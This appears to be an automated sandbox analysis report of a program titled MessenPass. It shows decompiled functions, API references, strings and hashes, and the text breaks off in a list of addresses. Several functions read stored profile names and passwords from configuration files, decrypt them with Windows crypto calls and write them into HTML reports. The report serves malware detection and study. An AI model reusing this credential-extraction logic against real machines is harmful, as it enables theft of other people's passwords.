                                • Instruction ID: d6ea28dcef1c43b6611216e97a84ccd45a66baff8fdfae9b3007c4cad2cc92f3
                                • Opcode Fuzzy Hash: e5345bd8614f8dcd2d1c308e40a1d6c5d5934fe6eb63f7ee50686fc0058a6628
                                • Instruction Fuzzy Hash: 2F31307324E3127AF714B9336D02BEB27898F11B66F24082FFA09B11C1EE7D5A55419E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004124D4, Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 101COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _mbscat$memsetsprintf$_mbscpy
                                • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                • API String ID: 633282248-1996832678
                                • Opcode ID: 011dc5066fb19440f4804de798d1f4ec702ddfa9614fe7101a4430c164161ab3
                                • Instruction ID: 0d87bc4a3c90cd549b7ee136a842ac2d8ae4f17c90590582d174715666fd6da4
                                • Opcode Fuzzy Hash: 011dc5066fb19440f4804de798d1f4ec702ddfa9614fe7101a4430c164161ab3
                                • Instruction Fuzzy Hash: CB31C7B2801215BEDB10AE549D939CAF76CAF10315F1441AFF514B2181EABC9FD08BAD
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040A242, Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 182COMMON
                                Download Yara Rule
                                C-Code - Quality: 48%
                                			E0040A242(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void _v79;
				char _v80;
				void _v131;
				char _v132;
				void _v183;
				char _v184;
				char _v236;
				void _v491;
				char _v492;
				void* _t83;
				void* _t98;
				intOrPtr* _t100;
				intOrPtr* _t112;
				signed int _t113;
				intOrPtr _t131;
				signed int _t144;
				signed int _t145;
				signed int _t148;
				intOrPtr* _t149;
				void* _t150;
				void* _t152;

				_t112 = __ebx;
				_v492 = 0;
				memset( &_v491, 0, 0xfe);
				_t113 = 0xc;
				memcpy( &_v236, 0x418424, _t113 << 2);
				asm("movsb");
				_t148 = 0;
				_v132 = 0;
				memset( &_v131, 0, 0x31);
				_v184 = 0;
				memset( &_v183, 0, 0x31);
				_v80 = 0;
				memset( &_v79, 0, 0x31);
				_t152 = _t150 + 0x3c;
				_t83 =  *((intOrPtr*)( *__ebx + 0x10))();
				_v12 =  *((intOrPtr*)(__ebx + 0x1b4));
				if(_t83 != 0xffffffff) {
					0x41241f(_t83,  &_v492);
					_push(_t83);
					sprintf( &_v132, " bgcolor="%s"");
					_t152 = _t152 + 0x14;
				}
				E004067EC(_a4, "<table border="1" cellpadding="5">");
				_v8 = _t148;
				if( *((intOrPtr*)(_t112 + 0x20)) > _t148) {
					while(1) {
						_t144 =  *( *((intOrPtr*)(_t112 + 0x24)) + _v8 * 4);
						if( *((intOrPtr*)((_t144 << 4) +  *((intOrPtr*)(_t112 + 0x34)) + 4)) != _t148) {
							0x413d0c( &_v80, " nowrap");
						}
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _t148;
						_t149 = _a8;
						 *((intOrPtr*)( *_t112 + 0x30))(5, _v8, _t149,  &_v28);
						0x41241f(_v28,  &_v184);
						 *((intOrPtr*)( *_t149))(_t144,  *(_t112 + 0x4c));
						0x41244b();
						 *((intOrPtr*)( *_t112 + 0x48))( *((intOrPtr*)(_t112 + 0x50)), _t149, _t144);
						_t98 =  *((intOrPtr*)( *_t112 + 0x14))();
						_t145 = _t144 * 0x14;
						if(_t98 == 0xffffffff) {
							0x413d0c( *(_t112 + 0x54),  *((intOrPtr*)(_t145 + _v12 + 0x10)));
						} else {
							0x41241f(_t98,  &_v492,  *((intOrPtr*)(_t145 + _v12 + 0x10)));
							_push(_t98);
							sprintf( *(_t112 + 0x54), "<font color="%s">%s</font>");
							_t152 = _t152 + 0x10;
						}
						_t100 =  *((intOrPtr*)(_t112 + 0x50));
						_t131 =  *_t100;
						if(_t131 == 0 || _t131 == 0x20) {
							0x413cf4(_t100, "&nbsp;");
						}
						0x4124d4( *((intOrPtr*)(_t112 + 0x58)),  *((intOrPtr*)(_t112 + 0x50)));
						sprintf( *(_t112 + 0x4c),  &_v236,  &_v132,  *(_t112 + 0x54),  &_v184,  &_v80,  *((intOrPtr*)(_t112 + 0x58)));
						E004067EC(_a4,  *(_t112 + 0x4c));
						_t152 = _t152 + 0x2c;
						_v8 = _v8 + 1;
						if(_v8 >=  *((intOrPtr*)(_t112 + 0x20))) {
							goto L14;
						}
						_t148 = 0;
					}
				}
				L14:
				E004067EC(_a4, "</table><p>");
				return E004067EC(_a4, 0x417de8);
			}






























                                0x0040a242
                                0x0040a25b
                                0x0040a262
                                0x0040a269
                                0x0040a275
                                0x0040a277
                                0x0040a27a
                                0x0040a281
                                0x0040a285
                                0x0040a294
                                0x0040a29b
                                0x0040a2a7
                                0x0040a2ab
                                0x0040a2b2
                                0x0040a2b7
                                0x0040a2c3
                                0x0040a2c6
                                0x0040a2d0
                                0x0040a2d5
                                0x0040a2df
                                0x0040a2e4
                                0x0040a2e4
                                0x0040a2ef
                                0x0040a2f9
                                0x0040a2fc
                                0x0040a306
                                0x0040a30c
                                0x0040a31b
                                0x0040a326
                                0x0040a32c
                                0x0040a32f
                                0x0040a333
                                0x0040a337
                                0x0040a33f
                                0x0040a342
                                0x0040a34d
                                0x0040a35a
                                0x0040a369
                                0x0040a36e
                                0x0040a37c
                                0x0040a383
                                0x0040a386
                                0x0040a38c
                                0x0040a3c1
                                0x0040a38e
                                0x0040a39d
                                0x0040a3a4
                                0x0040a3ad
                                0x0040a3b2
                                0x0040a3b2
                                0x0040a3c8
                                0x0040a3cb
                                0x0040a3cf
                                0x0040a3dc
                                0x0040a3e2
                                0x0040a3ec
                                0x0040a410
                                0x0040a41b
                                0x0040a420
                                0x0040a423
                                0x0040a42c
                                0x00000000
                                0x00000000
                                0x0040a304
                                0x0040a304
                                0x0040a306
                                0x0040a432
                                0x0040a43a
                                0x0040a452

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                • API String ID: 710961058-601624466
                                • Opcode ID: 01ba515a634d510913fe2f235f109e28ad47b200226b44b89f882b7dae9418f4
                                • Instruction ID: 690333ed3326df0f6eed54148ed3e596883a3b3feedda5c4c7dc15c04e40e9a4
                                • Opcode Fuzzy Hash: 01ba515a634d510913fe2f235f109e28ad47b200226b44b89f882b7dae9418f4
                                • Instruction Fuzzy Hash: 5B61AE31900208AFDF14DF54CC86EDE7B79EF08314F1001AAF909AB1D2DB799A94CB55
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040DD65, Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 178stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 81%
                                			E0040DD65(intOrPtr* _a4, char* _a8, char* _a12, intOrPtr _a16) {
				void _v267;
				char _v268;
				void _v523;
				char _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				int _v788;
				int _v1044;
				void _v2067;
				char _v2068;
				void _v3091;
				char _v3092;
				void _v4115;
				int _v4116;
				void* __ebx;
				void* __edi;
				int _t62;
				intOrPtr* _t95;
				int _t111;
				int _t118;
				intOrPtr* _t128;
				void* _t134;
				void* _t135;
				void* _t136;

				0x414060();
				_t111 = 0;
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				_t62 = strlen(_a8);
				_t6 = strlen(_a12) + 1; // 0x1
				_t135 = _t134 + 0x14;
				if(_t62 + _t6 >= 0x104) {
					_v268 = 0;
				} else {
					E00406B4B( &_v268, _a8, _a12);
				}
				if(E004069D3( &_v268) != 0) {
					memset( &_v2067, _t111, 0x3ff);
					memset( &_v3091, _t111, 0x3ff);
					memset( &_v4115, _t111, 0x3ff);
					_v524 = _t111;
					memset( &_v523, _t111, 0xfe);
					_push(_t111);
					_a12 = _t111;
					_v2068 = _t111;
					_v3092 = _t111;
					_v4116 = _t111;
					sprintf( &_v524, "profile %d");
					_t136 = _t135 + 0x3c;
					GetPrivateProfileStringA( &_v524, "name", 0x417c88,  &_v2068, 0x3ff,  &_v268);
					GetPrivateProfileStringA( &_v524, "password", 0x417c88,  &_v3092, 0x3ff,  &_v268);
					if(_v2068 != _t111) {
						L7:
						while(_v3092 != _t111) {
							E0040DCF2( &_v4116,  &_v3092);
							_v528 = _a16;
							_v1044 = _t111;
							_v788 = _t111;
							_v532 = 3;
							E00406958(0xff,  &_v788,  &_v4116);
							_t128 =  &_v1044;
							E00406958(0xff, _t128,  &_v2068);
							_t118 = _v1044;
							_t95 = _t128;
							while(_t118 != 0) {
								if(_t118 >= 0x30 && _t118 <= 0x39) {
									_t95 = _t95 + 1;
									_t118 =  *_t95;
									continue;
								}
								L14:
								_push( &_v1044);
								if( *((intOrPtr*)( *_a4))() != 0) {
									_a12 =  &(_a12[1]);
									_push(_a12);
									_v2068 = 0;
									_v3092 = 0;
									_v4116 = 0;
									sprintf( &_v524, "profile %d");
									_t136 = _t136 + 0xc;
									GetPrivateProfileStringA( &_v524, "name", 0x417c88,  &_v2068, 0x3ff,  &_v268);
									GetPrivateProfileStringA( &_v524, "password", 0x417c88,  &_v3092, 0x3ff,  &_v268);
									if(_v2068 != 0) {
										_t111 = 0;
										goto L7;
									}
								}
								goto L16;
							}
							_v528 = 3;
							goto L14;
						}
					}
				}
				L16:
				return 1;
			}



























                                0x0040dd6d
                                0x0040dd7a
                                0x0040dd85
                                0x0040dd8b
                                0x0040dd93
                                0x0040dda2
                                0x0040dda6
                                0x0040ddab
                                0x0040ddc2
                                0x0040ddad
                                0x0040ddb9
                                0x0040ddbf
                                0x0040ddd7
                                0x0040ddeb
                                0x0040ddf9
                                0x0040de07
                                0x0040de19
                                0x0040de1f
                                0x0040de24
                                0x0040de31
                                0x0040de34
                                0x0040de3a
                                0x0040de40
                                0x0040de46
                                0x0040de51
                                0x0040de74
                                0x0040de96
                                0x0040de9e
                                0x00000000
                                0x0040dea8
                                0x0040dec2
                                0x0040deca
                                0x0040ded6
                                0x0040dedc
                                0x0040deee
                                0x0040def8
                                0x0040df04
                                0x0040df0a
                                0x0040df11
                                0x0040df17
                                0x0040df28
                                0x0040df1e
                                0x0040df25
                                0x0040df26
                                0x00000000
                                0x0040df26
                                0x0040df36
                                0x0040df41
                                0x0040df46
                                0x0040df4c
                                0x0040df4f
                                0x0040df5e
                                0x0040df65
                                0x0040df6c
                                0x0040df73
                                0x0040df7e
                                0x0040dfa2
                                0x0040dfc0
                                0x0040dfc9
                                0x0040dea6
                                0x00000000
                                0x0040dea6
                                0x0040dfc9
                                0x00000000
                                0x0040df46
                                0x0040df2c
                                0x00000000
                                0x0040df2c
                                0x0040dea8
                                0x0040de9e
                                0x0040dfcf
                                0x0040dfd6

                                APIs
                                • memset.MSVCRT ref: 0040DD8B
                                • strlen.MSVCRT ref: 0040DD93
                                • strlen.MSVCRT ref: 0040DD9D
                                • memset.MSVCRT ref: 0040DDEB
                                • memset.MSVCRT ref: 0040DDF9
                                • memset.MSVCRT ref: 0040DE07
                                • memset.MSVCRT ref: 0040DE1F
                                • sprintf.MSVCRT ref: 0040DE46
                                • GetPrivateProfileStringA.KERNEL32(?,name,00417C88,?,000003FF,?), ref: 0040DE74
                                • GetPrivateProfileStringA.KERNEL32(?,password,00417C88,?,000003FF,?), ref: 0040DE96
                                  • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                  • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                • sprintf.MSVCRT ref: 0040DF73
                                • GetPrivateProfileStringA.KERNEL32(?,name,00417C88,?,000003FF,?), ref: 0040DFA2
                                • GetPrivateProfileStringA.KERNEL32(?,password,00417C88,?,000003FF,?), ref: 0040DFC0
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memset$PrivateProfileString$sprintfstrlen$_mbscat_mbscpy
                                • String ID: name$password$profile %d
                                • API String ID: 3544386798-2462908242
                                • Opcode ID: e7b187a0626f75cc39379d2bba276785f1ae62edefe99cb3f3bfbc37819d7c60
                                • Instruction ID: 9e46ac0295d5b354e730bb81602d93da8fcedc4e5bf25204c2bd197169999166
                                • Opcode Fuzzy Hash: e7b187a0626f75cc39379d2bba276785f1ae62edefe99cb3f3bfbc37819d7c60
                                • Instruction Fuzzy Hash: DA61A5B284425DAEDB20DB54DC40FDA77BCAF15304F1444EAA559E3141DBB89FC88FA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004125F1, Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 114COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: sprintf$memset$_mbscpy
                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                • API String ID: 3402215030-3842416460
                                • Opcode ID: ea06b0d74ada23c5ef34a7984231b84acf2e1d6cd6bcfe81b43f4a3791556408
                                • Instruction ID: a5bfc8ec8e60557daa4b034ce7241d6b1778398f1e76627a293d7ac05c42f781
                                • Opcode Fuzzy Hash: ea06b0d74ada23c5ef34a7984231b84acf2e1d6cd6bcfe81b43f4a3791556408
                                • Instruction Fuzzy Hash: D24173B280121DBADB21EE54DC45FEB776CAF14309F0400ABF518E2142E6789FD88BA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004010D0, Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 111COMMON
                                Download Yara Rule
                                C-Code - Quality: 94%
                                			E004010D0(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, signed short _a12) {
				void* __edi;
				void* _t28;
				void* _t37;
				unsigned int _t38;
				void* _t44;
				void* _t49;
				signed short _t50;
				struct HWND__* _t52;
				signed short _t58;
				struct HWND__* _t60;
				void* _t70;
				void* _t71;

				_t70 = __edx;
				_t28 = _a4 - 0x110;
				_t71 = __ecx;
				if(_t28 == 0) {
					SetWindowTextA( *(__ecx + 4), "MessenPass");
					SetDlgItemTextA( *(_t71 + 4), 0x3ea, _t71 + 0xc);
					SetDlgItemTextA( *(_t71 + 4), 0x3ec, _t71 + 0x10b);
					E00401085(_t71);
					E00406CAA(_t70,  *(_t71 + 4));
					L16:
					return 0;
				}
				_t37 = _t28 - 1;
				if(_t37 == 0) {
					_t38 = _a8;
					if(_t38 != 1 || _t38 >> 0x10 != 0) {
						goto L16;
					} else {
						EndDialog( *(__ecx + 4), 1);
						DeleteObject( *(_t71 + 0x20c));
						L7:
						return 1;
					}
				}
				_t44 = _t37 - 0x27;
				if(_t44 == 0) {
					if(_a12 != GetDlgItem( *(__ecx + 4), 0x3ec)) {
						goto L16;
					}
					SetBkMode(_a8, 1);
					SetTextColor(_a8, 0xc00000);
					return GetSysColorBrush(0xf);
				}
				_t49 = _t44 - 0xc8;
				if(_t49 == 0) {
					_t50 = _a12;
					_t52 = GetDlgItem( *(__ecx + 4), 0x3ec);
					_push(_t50 >> 0x10);
					_a12 = _t52;
					if(ChildWindowFromPoint( *(_t71 + 4), _t50 & 0x0000ffff) != _a12) {
						goto L16;
					}
					SetCursor(LoadCursorA( *0x41dbd4, 0x67));
					goto L7;
				}
				if(_t49 != 0) {
					goto L16;
				}
				_t58 = _a12;
				_t60 = GetDlgItem( *(__ecx + 4), 0x3ec);
				_push(_t58 >> 0x10);
				_a12 = _t60;
				if(ChildWindowFromPoint( *(_t71 + 4), _t58 & 0x0000ffff) != _a12) {
					goto L16;
				}
				E00406D6B( *(_t71 + 4), _t71 + 0x10b);
				goto L7;
			}















                                0x004010d0
                                0x004010d6
                                0x004010de
                                0x004010e0
                                0x00401204
                                0x0040121c
                                0x0040122d
                                0x0040122f
                                0x00401237
                                0x0040123d
                                0x00000000
                                0x0040123d
                                0x004010e6
                                0x004010e7
                                0x004011cf
                                0x004011d6
                                0x00000000
                                0x004011e0
                                0x004011e5
                                0x004011f1
                                0x00401146
                                0x00000000
                                0x00401148
                                0x004011d6
                                0x004010ed
                                0x004010f0
                                0x004011a6
                                0x00000000
                                0x00000000
                                0x004011b1
                                0x004011bf
                                0x00000000
                                0x004011c7
                                0x004010f6
                                0x004010fb
                                0x0040114e
                                0x00401161
                                0x00401167
                                0x0040116c
                                0x00401178
                                0x00000000
                                0x00000000
                                0x0040118d
                                0x00000000
                                0x0040118d
                                0x004010ff
                                0x00000000
                                0x00000000
                                0x00401105
                                0x00401118
                                0x0040111e
                                0x00401123
                                0x0040112f
                                0x00000000
                                0x00000000
                                0x0040113f
                                0x00000000

                                APIs
                                • GetDlgItem.USER32(?,000003EC), ref: 00401118
                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401126
                                  • Part of subcall function 00406D6B: ShellExecuteA.SHELL32(?,open,?,00417C88,00417C88,00000005), ref: 00406D81
                                • GetDlgItem.USER32(?,000003EC), ref: 00401161
                                • ChildWindowFromPoint.USER32(?,?,?), ref: 0040116F
                                • LoadCursorA.USER32(00000067), ref: 00401186
                                • SetCursor.USER32(00000000,?,?), ref: 0040118D
                                • GetDlgItem.USER32(?,000003EC), ref: 0040119D
                                • SetBkMode.GDI32(?,00000001), ref: 004011B1
                                • SetTextColor.GDI32(?,00C00000), ref: 004011BF
                                • GetSysColorBrush.USER32(0000000F), ref: 004011C7
                                • EndDialog.USER32(?,00000001), ref: 004011E5
                                • DeleteObject.GDI32(?), ref: 004011F1
                                • SetWindowTextA.USER32(?,MessenPass), ref: 00401204
                                • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040121C
                                • SetDlgItemTextA.USER32(?,000003EC,?), ref: 0040122D
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Item$Text$Window$ChildColorCursorFromPoint$BrushDeleteDialogExecuteLoadModeObjectShell
                                • String ID: MessenPass
                                • API String ID: 2410034309-1347981195
                                • Opcode ID: 843b1ff313390d25d34e2be648776c3666369c8dad7882cf094c1c7715f69dbe
                                • Instruction ID: 61c274a33cdd550ae885db2c0d410d86e96b4f8b628e001bd40ef85afa118776
                                • Opcode Fuzzy Hash: 843b1ff313390d25d34e2be648776c3666369c8dad7882cf094c1c7715f69dbe
                                • Instruction Fuzzy Hash: 6D31D271500A4AFBDB026FA0DD49EEABB7AFB44301F508236F915E61B0C7759861DB88
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040C50E, Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 70COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _strcmpi
                                • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                • API String ID: 1439213657-1959339147
                                • Opcode ID: 42829d603ed6219f05e00acd70f5009b327ef2ea2f3e71e7fd8bced316a66bba
                                • Instruction ID: dd15bb3cc8bdf641e1a17555e2464251a39e176c696be1a009fdff25c7df10cc
                                • Opcode Fuzzy Hash: 42829d603ed6219f05e00acd70f5009b327ef2ea2f3e71e7fd8bced316a66bba
                                • Instruction Fuzzy Hash: DE011AB229A32178F9286A773C07BD70A488B51F7BF70065FF408E40C1FE5C968054AD
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00404D18, Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 33libraryloaderCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E00404D18(struct HINSTANCE__** __esi) {
				void* _t7;
				struct HINSTANCE__* _t8;
				_Unknown_base(*)()* _t14;

				if( *__esi == 0) {
					_t8 = LoadLibraryA("advapi32.dll");
					 *__esi = _t8;
					__esi[1] = GetProcAddress(_t8, "CryptAcquireContextA");
					__esi[2] = GetProcAddress( *__esi, "CryptReleaseContext");
					__esi[3] = GetProcAddress( *__esi, "CryptCreateHash");
					__esi[4] = GetProcAddress( *__esi, "CryptGetHashParam");
					__esi[5] = GetProcAddress( *__esi, "CryptHashData");
					_t14 = GetProcAddress( *__esi, "CryptDestroyHash");
					__esi[6] = _t14;
					return _t14;
				}
				return _t7;
			}






                                0x00404d1b
                                0x00404d23
                                0x00404d35
                                0x00404d40
                                0x00404d4c
                                0x00404d58
                                0x00404d64
                                0x00404d70
                                0x00404d73
                                0x00404d75
                                0x00000000
                                0x00404d78
                                0x00404d79

                                APIs
                                • LoadLibraryA.KERNEL32(advapi32.dll,?,004084A6), ref: 00404D23
                                • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00404D37
                                • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00404D43
                                • GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 00404D4F
                                • GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 00404D5B
                                • GetProcAddress.KERNEL32(?,CryptHashData), ref: 00404D67
                                • GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 00404D73
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: CryptAcquireContextA$CryptCreateHash$CryptDestroyHash$CryptGetHashParam$CryptHashData$CryptReleaseContext$advapi32.dll
                                • API String ID: 2238633743-1621422469
                                • Opcode ID: 11447201b65d866f37edbf99505d086a0ab8926e77609814987dd4a6320f0436
                                • Instruction ID: 844867562ca0833f301e0ac6fd14d3db62e181894ebadeef568166b0b2be0524
                                • Opcode Fuzzy Hash: 11447201b65d866f37edbf99505d086a0ab8926e77609814987dd4a6320f0436
                                • Instruction Fuzzy Hash: 4FF09774940B48AECB30AF759C09E86BEE1EF9C7007224D2EE2C553650DA799084CE88
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00404578, Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 240COMMON
                                Download Yara Rule
                                C-Code - Quality: 82%
                                			E00404578(wchar_t** __ebx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _v36;
				int _v40;
				void* _v44;
				int _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				wchar_t* _v64;
				int _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v80;
				intOrPtr _v84;
				char _v88;
				intOrPtr _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				intOrPtr _v108;
				char _v112;
				long _v148;
				short _v666;
				void _v1176;
				char _v2200;
				char _v2712;
				void _v3222;
				char _v3224;
				void* __esi;
				int _t118;
				signed int _t122;
				signed int _t123;
				wchar_t* _t127;
				int _t129;
				int _t137;
				void* _t146;
				int _t156;
				wchar_t* _t160;
				wchar_t* _t161;
				void* _t165;
				int _t175;
				wchar_t* _t178;
				wchar_t** _t182;
				signed int _t183;
				void* _t203;
				signed int _t205;
				signed int _t207;
				wchar_t* _t210;
				wchar_t* _t214;
				void* _t215;
				void* _t216;
				intOrPtr* _t217;
				void* _t218;
				void* _t243;

				_t182 = __ebx;
				_t183 = 9;
				memcpy( &_v148, 0x417fb8, _t183 << 2);
				_t217 = _t216 + 0xc;
				_t118 = wcslen( &_v148);
				_t205 = 0;
				_v68 = _t118;
				 *_t217 = 0xbfe;
				_v3224 = 0;
				memset( &_v3222, 0, ??);
				_t218 = _t217 + 0xc;
				if(E00406B3B() == 0) {
					_push(3);
					_v20 = 4;
				} else {
					_push(4);
					_v20 = 5;
				}
				_pop(_t122);
				_t123 = _t122 << 9;
				_v28 = _t123;
				_t182[1] = _t215 + _t123 - 0xc94;
				 *_t182 =  &_v3224;
				_t182[3] =  &_v2712;
				_t127 = _t215 + (_v20 << 9) - 0xc94;
				_t182[4] =  &_v2200;
				_v64 = _t127;
				_t182[2] = _t127;
				_t203 = 0;
				_v12 = _t205;
				goto L5;
				L6:
				_v24 = _t205;
				_v32 = _t205;
				if(_v12 != _v20) {
					L20:
					if(_v12 != 4) {
						L30:
						if(_v32 == 0) {
							_t137 = _v16;
							if(_t137 > 0x1fa) {
								_t137 = 0x1fa;
							}
							_t99 = _a8 + 4; // 0x8
							_t207 = _v12 << 9;
							memcpy(_t215 + _t207 - 0xc94, _t203 + _t99, _t137);
							 *(_t215 + _t207 - 0xa96) =  *(_t215 + _t207 - 0xa96) & 0x00000000;
							_t218 = _t218 + 0xc;
							if(_v12 == 0) {
								E00406B3B();
							}
						}
						goto L35;
					}
					_t232 = _t182[5] - 4;
					if(_t182[5] != 4) {
						goto L30;
					}
					_v60 = 0;
					_v52 = 0;
					_v56 = 0;
					if(E00404C9D( &_v60, _t232) == 0) {
						L29:
						E00404CE0( &_v60);
						if(_v24 != 0) {
							goto L35;
						}
						goto L30;
					}
					_t146 = 0;
					do {
						_t72 = _t146 + 0x41da78; // 0x320038
						 *(_t146 + 0x41eb80) =  *_t72 << 2;
						_t146 = _t146 + 2;
					} while (_t146 < 0x4a);
					_t76 = _a8 + 4; // 0x8
					_v100 = _t203 + _t76;
					_v104 = _v16;
					_v88 = 0x4a;
					_v84 = 0x41eb80;
					if(E00404CF5( &_v60,  &_v104,  &_v88,  &_v48) != 0) {
						_t156 = _v48;
						if(_t156 > 0x1fa) {
							_t156 = 0x1fa;
						}
						memcpy( &_v1176, _v44, _t156);
						_t218 = _t218 + 0xc;
						_v666 = 0;
						LocalFree(_v44);
						_v24 = 1;
					}
					goto L29;
				} else {
					_t210 =  *_t182;
					_t160 = wcschr(_t210, 0x3d);
					if(_t160 != 0) {
						_t31 =  &(_t160[0]); // 0x2
						_t210 = _t31;
					}
					_t161 =  &_v148;
					0x413d86(_t210, _t161, _v68);
					_t218 = _t218 + 0xc;
					_t223 = _t161;
					if(_t161 != 0) {
						goto L20;
					}
					_v80 = 0;
					_v72 = 0;
					_v76 = 0;
					if(E00404C9D( &_v80, _t223) == 0) {
						L19:
						E00404CE0( &_v80);
						goto L20;
					}
					_t165 = 0;
					do {
						_t38 = _t165 + 0x41dac8; // 0x620061
						 *(_t165 + 0x41e980) =  *_t38 << 2;
						_t165 = _t165 + 2;
					} while (_t165 < 0x4a);
					_t42 = _a8 + 4; // 0x8
					_v108 = _t203 + _t42;
					_v112 = _v16;
					_v96 = 0x4a;
					_v92 = 0x41e980;
					if(E00404CF5( &_v80,  &_v112,  &_v96,  &_v40) != 0) {
						_t175 = _v40;
						if(_t175 > 0x1fa) {
							_t175 = 0x1fa;
						}
						_t214 = _t215 + _v28 - 0xc94;
						memcpy(_t214, _v36, _t175);
						 *(_t215 + _v28 - 0xa96) =  *(_t215 + _v28 - 0xa96) & 0x00000000;
						_t178 = wcschr(_t214, 0x3a);
						_t218 = _t218 + 0x14;
						if(_t178 != 0) {
							 *_t178 =  *_t178 & 0x00000000;
							wcscpy(_v64,  &(_t178[0]));
						}
						_v32 = 1;
						LocalFree(_v36);
					}
					goto L19;
				}
				L35:
				_v12 = _v12 + 1;
				_t203 = _t203 + _v16 + 4;
				if(E00406B3B() == 0) {
					__eflags = _v12 - 5;
				} else {
					_t243 = _v12 - 6;
				}
				if(_t243 >= 0 || _t203 > _a12) {
					 *((intOrPtr*)( *_a4))(_t182);
					return 1;
				} else {
					_t205 = 0;
					__eflags = 0;
					L5:
					_t129 =  *(_t203 + _a8);
					_v16 = _t129;
					if(_t129 <= _t205) {
						goto L35;
					}
					goto L6;
				}
			}






























































                                0x00404578
                                0x00404585
                                0x00404598
                                0x00404598
                                0x0040459a
                                0x0040459f
                                0x004045a1
                                0x004045a4
                                0x004045b3
                                0x004045ba
                                0x004045bf
                                0x004045c9
                                0x004045d6
                                0x004045d8
                                0x004045cb
                                0x004045cb
                                0x004045cd
                                0x004045cd
                                0x004045df
                                0x004045e0
                                0x004045e3
                                0x004045f3
                                0x004045f9
                                0x00404604
                                0x00404607
                                0x00404614
                                0x00404617
                                0x0040461a
                                0x0040461d
                                0x0040461f
                                0x00404622
                                0x00404637
                                0x0040463d
                                0x00404640
                                0x00404643
                                0x0040474a
                                0x0040474e
                                0x00404810
                                0x00404814
                                0x00404816
                                0x00404820
                                0x00404822
                                0x00404822
                                0x0040482b
                                0x00404830
                                0x0040483b
                                0x00404840
                                0x00404849
